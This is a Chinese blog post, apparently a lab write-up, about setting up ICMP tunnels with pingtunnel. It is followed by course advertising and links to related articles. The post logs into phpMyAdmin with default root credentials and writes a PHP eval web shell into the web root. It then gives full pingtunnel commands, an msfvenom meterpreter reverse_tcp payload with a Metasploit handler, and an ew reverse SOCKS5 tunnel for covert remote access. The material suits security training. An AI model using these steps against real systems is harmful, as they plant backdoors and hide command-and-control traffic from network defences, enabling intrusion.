icmp隧道搭建(pingtunnel的使用)

已于 2024-01-18 18:11:22 修改
阅读量79 收藏
点赞数
文章标签: 服务器 负载均衡 运维
于 2023-07-29 13:32:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53058639/article/details/131993950
版权
文章介绍了如何利用pingtunnel工具在KaliLinux和Windows之间建立ICMP隧道,结合msfvenom创建reverse_tcpPayload,通过设置代理实现远程访问。此外,还提到了ew工具用于建立socks5隧道,并在靶机上进行Web渗透测试,展示了网络安全工程师进行企业级学习的阶段性技能。
摘要由CSDN通过智能技术生成

icmp隧道搭建

在上个星期一个风和日丽得早上,上班刚打开电脑,师兄就发来了这样一条消息

image-20210721110118826

然后我就去测试了,访问页面如下,页面显示探针路径C:/phpStudy/WWW/l.php

image-20210721110640198

随手输了个root root检测,没想到真的是(靶场嘛,比较简单,大家勿喷哈~)

image-20210721110754511

image-20210721110809341

使用phpmyadmin连接MySQL,输入root:root

image-20210721111301712

查询数据库版本

select @@version;

image-20210721111602594

基础语法查询是否 secure_file_priv 没有限制

show global variables like '%secure_file_priv%';

NULL 不允许导入或导出,/tmp 只允许在 /tmp 目录导入导出,空 表示不限制目录

结果为空,直接写入一句话,这里因为我已经写入了,所以显示的已存在。

select '<?php @eval($_POST[zcc]);?>' into outfile 'C:/phpStudy/WWW/zcc1.php';

蚁剑连接

接下来就练习一下icmp隧道的搭建

工具一:pingtunnel 下载链接:https://github.com/esrrhs/pingtunnel/releases
准备一台kali传上pingtunnel,目标机也传上pingtunnel.exe,kali的ip:192.168.10.65 桥接

image-20210726101410062

image-20210721142732668

pingtunnel上线
vps机上执行以下命令, 开启服务器模式
./pingtunnel -type server

image-20210726105542324

客户端执行 以下命令,客户端本地监听8699端口 ,将监听到的连接通过icmpserver发送到Linsten_ip:38975,通过TCP隧道

注意,在客户端中运行一定要加noprint nolog两个参数,否则会生成大量的日志文件

pingtunnel.exe -type client -l 127.0.0.1:38975 -s icmpserver_ip -t 192.168.10.65:38975 -tcp 1 -noprint 1 -nolog 1

此时服务端会有回显

image-20210726142918433

msf上线

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=38975 -f exe > /tmp/zccccz.exe



msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.65
set lport 38975
exploit

image-20210726144312921

image-20210726144359393

组合ew建立socks5隧道

ew下载链接:https://github.com/idlefire/ew

这里在kali vps端运行如下命令

./ew_for_linux64 -s rcsocks -l 10080 -e 8898
./pingtunnel -type server

客户端执行以下命令,ew回显ok,表示隧道打通。

开启ICMP隧道,采用sock5模式,将127.0.0.1:9999(pingtunnel客户端监听端口)所监听到的请求通过192.168.10.65之间的ICMP隧道送至192.168.10.65:8898(ew服务端监听主机端口)

pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.10.65 -t 192.168.10.65:8898 -sock5 -1 -noprint 1 -nolog 1

image-20210726170320821

这里因为靶机出了点问题就关了,打的师兄得虚拟机,所以回显得ip不太一样。

ew_for_Win.exe -s rssocks -d 127.0.0.1 -e 9999

连接代理,这里用的proxifier,可以远程访问表示隧道建立成功。

image-20210726163541780

66c9aac9323047b5f88b73e115cfb2d

image-20210726175840545

roxifier,可以远程访问表示隧道建立成功。

[外链图片转存中…(img-QKkuK8Yo-1690608635757)]

[外链图片转存中…(img-sIR25ISZ-1690608635760)]

[外链图片转存中…(img-cADKicdo-1690608635761)]

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LLl8Zel2-1690608635768)(C:\Users\Administrator\Desktop\网络安全资料图\微信截图_20230201105953.png)]

程序员小肖
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
p71 内网安全-域横向网络&传输&应用层隧道技术
weixin_43263566的博客
05-07 1158
内网安全-域横向网络&传输&应用层隧道技术
icmp隧道工具之ptunnel使用
songling515010475的专栏
06-10 876
ptunnel工具使用
DNS与ICMP隧道资料
11-01
以前自己收集的一些DNS和ICMP隧道技术的文档, 非常有用, 包括源代码及文档资料, 欢迎下载
HC110110004 ICMP协议
最新发布
01-05
Ping使用ICMP Echo Request报文来查询某些信息,并通过ICMP Echo Reply报文来响应,进行差错检测。Tracert是使用ICMP Echo Request报文来跟踪数据包的传输路径,了解网络拓扑结构。 ICMP报文类型有很多种,每种...
ICMP-Tx:ICMP隧道
07-03
使用ICMP-Tx时,用户可能需要了解基本的网络协议知识,包括IP地址、端口号、ICMP消息类型和代码等。为了更好地利用这个工具,用户还需要熟悉Python编程,至少需要理解如何执行命令行脚本以及处理返回的结果。对于非...
ICMP.rar_ICMP通信实现_icmp
09-20
在压缩包内的文件"www.pudn.com.txt"可能包含的是相关文档或说明,可能提供了关于如何使用和理解ICMP实现的详细信息。而"ICMP.C"则很可能是源代码文件,用C语言编写,实现了ICMP协议的功能。开发者或学习者可以通过...
icmp.rar_icmp
09-24
总的来说,`icmp.rar_icmp`提供了一个研究和学习ICMP协议的实例,通过对`icmp.c`的阅读和分析,我们可以更深入地理解如何在实际应用中使用和处理ICMP报文,这对于网络编程和故障排查非常有帮助。
pingtunnel:ICMP流量伪装转发工具 ping tunnel is a tool that advertises tcpudpsocks5 traffic as icmp traffic for forwarding
04-28
Pingtunnel pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具 注意:本工具只是用作学习研究,请勿用于非法用途!!! 使用 安装服务端 首先准备好一个具有公网 ip 的服务器,假定域名或者公网 ip 是www.yourserver.com 从下载对应的安装包,如 pingtunnel_linux64.zip,然后解压,以root权限执行 sudo wget (最新release的下载链接) sudo unzip pingtunnel_linux64.zip sudo ./pingtunnel -type server (可选)关闭系统默认的 ping echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all 安装 GUI 客户端(新手推荐) 从下载 qt 的 gui 版本 双击 exe 运行,修改
http-tunnel(隧道)
01-22
QQ上网代理,能够在突破端口限制!!!!!!!!!!!!!!!!!
使用ICMP传递shellcode1
08-03
【标题】: 使用ICMP传递shellcode技术解析 【描述】: 在网络安全研究中,有时候攻击者会利用非传统的方式传递恶意代码,如通过ICMP协议。本文将深入探讨如何利用C#编程语言来实现ICMP协议传递shellcode的技术。 ...
icmp命令控制和隧道工具.zip
08-23
icmp命令控制和隧道工具;
ICMP_Router.rar_icmp
09-22
查询报文则用于网络诊断,例如著名的"Ping"命令就使用ICMP回显请求和回显应答报文,用来检查网络连接和测量数据包往返时间。 在描述中提到,ICMP是在IP数据报内部被传输的,这意味着它不是独立的协议,而是嵌入在...
Pingtunnel工具教程】利用ICMP隧道技术进行ICMP封装穿透防火墙
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
07-19 3423
在一些网络环境中,如果不经过认证,TCP和UDP数据包都会被拦截。如果用户可以ping通远程计算机,就可以尝试建立ICMP隧道,将TCP数据通过该隧道发送,实现不受限的网络访问。用户需要在受限制网络之外,预先启动该工具建立代理服务器。再以客户端模式运行该工具,就可以建立ICMP隧道。为了避免该隧道被滥用,用户还可以为隧道设置使用密码。内网渗透,渗透测试,内网隧道技术。......
PingTunnel隧道搭建
weixin_45007073的博客
04-10 1792
概述 PingTunnel也是一款ICMP隧道建立工具,但是它和icmpsh不同的是,pingtunnel工具能够设置隧道密码,避免隧道被其他同行利用。此次实验我们使用一台VPS服务器(kali攻击机)去攻击一台Windows Server2008主机,然后我们利用被突破的一台linux边界服务器为跳板机,建立一条隧道,最后我们的攻击者使用win7来连接我们的VPS攻击机。 隧道搭建准备 首先我们在VPS攻击机上安装PingTunnel这款工具,因为我使用的是新版的Kali机,所以只需要解决一个依赖问题即可
PingTunnel建立ICMP隧道
大方子
01-29 4933
介绍 Kali:192.168.61.145 WEB(Debian):192.168.61.151 win2008:192.168.61.154 假设我们Kali无法直接连接到win2008的3389端口,需要把WEB服务器作为跳板,再连接到win2008的3389端口 实验过程 我们需要现在Kali和WEB服务器上安装PingTunnel PingTunnel下载地址:http://freshmeat.sourceforge.net/projects/ptunnel/ 以下是在Kali演示安装过程 解压并
网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)
谢公子的博客
03-05 6097
目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道(Icmptunnel) ICMP隧道 ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相...
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值